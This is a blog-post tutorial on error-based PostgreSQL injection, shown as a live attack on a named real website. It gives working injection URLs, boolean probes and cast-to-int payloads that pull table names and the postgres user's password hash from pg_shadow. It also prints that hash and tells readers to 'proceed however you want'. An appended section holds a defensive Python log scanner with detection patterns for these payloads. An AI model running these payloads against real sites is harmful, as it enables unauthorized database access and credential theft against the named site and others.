Monday, May 30, 2011

Error-Based PostgreSQL Injection

This is a demo of how to attack a website with error-based PostgreSQL injection. I take as an example one of the 0day web apps I just published.

Our victim is http://www.creatop.com.cn
Try putting a ' at the end of the URL.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'
The output:
Code:
ERROR: syntax error at or near "''"

When I try
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1
it returns the TRUE page, while when I use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0
the FALSE page is returned.

So I know this is either blind SQL injection or error-based SQL injection.
I try the error-based method first.

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)
Owh, lucky!! It works! PostgreSQL!

So, proceed to get the table name.
Just like injecting other vulnerable websites, PostgreSQL is quite similar. In PostgreSQL error-based injection, every SQL query must be in this form (casting a text value to int fails, and PostgreSQL echoes the offending value in the error message, which is what leaks the data):
Code:
cast((your sql command/query) as int)
So, to get the table name we use cast((select table_name from information_schema.tables limit 1 offset 0) as int). What do we get?
Code:
ERROR: invalid input syntax for integer: "pg_type"
One of the table names is pg_type.
We check the other table names by increasing the offset number.
That way I find the pg_user and pg_shadow tables. I try to get the data from pg_shadow:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "postgres"
The usename is postgres.
How about the passwd?
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "md5caa5a31e69edef35ea15e2db062836a7"

There you are, we already have the passwd hash!
Then you can proceed however you want.
I will stop here; the rest you need to explore yourself.
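From the defender's side, every step of this write-up leaves a trace in the web server's access log: the MenuID parameter carrying something other than a number, the and 1=1 / and 1=0 probes, and the cast(... as int) payloads aimed at pg_shadow. The following scanner is an added example, not code from the original post; the log lines are constructed, and it assumes MenuID is the only integer parameter on the site.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the original post); the request targets
# mirror the probes in the write-up, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [30/May/2011:10:01:02 +0800] "GET /index.cfm?MenuID=80 HTTP/1.1" 200 5120
10.0.0.5 - - [30/May/2011:10:01:09 +0800] "GET /index.cfm?MenuID=80%27 HTTP/1.1" 500 812
10.0.0.5 - - [30/May/2011:10:01:15 +0800] "GET /index.cfm?MenuID=80%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [30/May/2011:10:01:21 +0800] "GET /index.cfm?MenuID=80%20and%201=0 HTTP/1.1" 200 640
10.0.0.5 - - [30/May/2011:10:01:40 +0800] "GET /index.cfm?MenuID=80%20and%201=cast(version()%20as%20int) HTTP/1.1" 500 812
10.0.0.5 - - [30/May/2011:10:02:03 +0800] "GET /index.cfm?MenuID=80%20and%201=cast((select%20passwd%20from%20pg_shadow%20limit%201%20offset%200)%20as%20int) HTTP/1.1" 500 812
10.0.0.9 - - [30/May/2011:10:05:00 +0800] "GET /index.cfm?MenuID=81 HTTP/1.1" 200 5100
"""

# Parameters the application treats as integers (assumption: MenuID is the only one).
INTEGER_PARAMS = {"MenuID"}

# Signatures for the three stages of the technique in the write-up.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(and|or)\s+1\s*=\s*[01]\b", re.I),
    "error_based_cast": re.compile(r"\bcast\s*\(.*\bas\s+int\b", re.I),
    "catalog_access": re.compile(r"\b(pg_shadow|pg_user|information_schema)\b", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify_request(target):
    """Return the signature names that fire on one request target (path + query)."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
            hits.append("non_integer_value")
        for label, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append(label)
    return list(dict.fromkeys(hits))  # de-duplicate, keep first-seen order

def scan_log(text):
    """One finding per logged request that trips at least one signature."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify_request(m.group(1))
        if hits:
            findings.append({"client": line.split()[0], "target": m.group(1),
                             "status": line.rsplit(" ", 2)[-2], "hits": hits})
    return findings
```

Running scan_log(SAMPLE_LOG) flags five of the seven requests, all from the same client, and the 500 responses on the cast payloads are the error pages that leak the values.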

References
Code:
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://pentestmonkey.net/blog/postgres-sql-injection-cheat-sheet/

Credit to: p0pc0rn


2 comments:

Anonymous said...

Nice. Thanks for da tutorial bro

3ndl3ssly said...

Thanks..a good method one
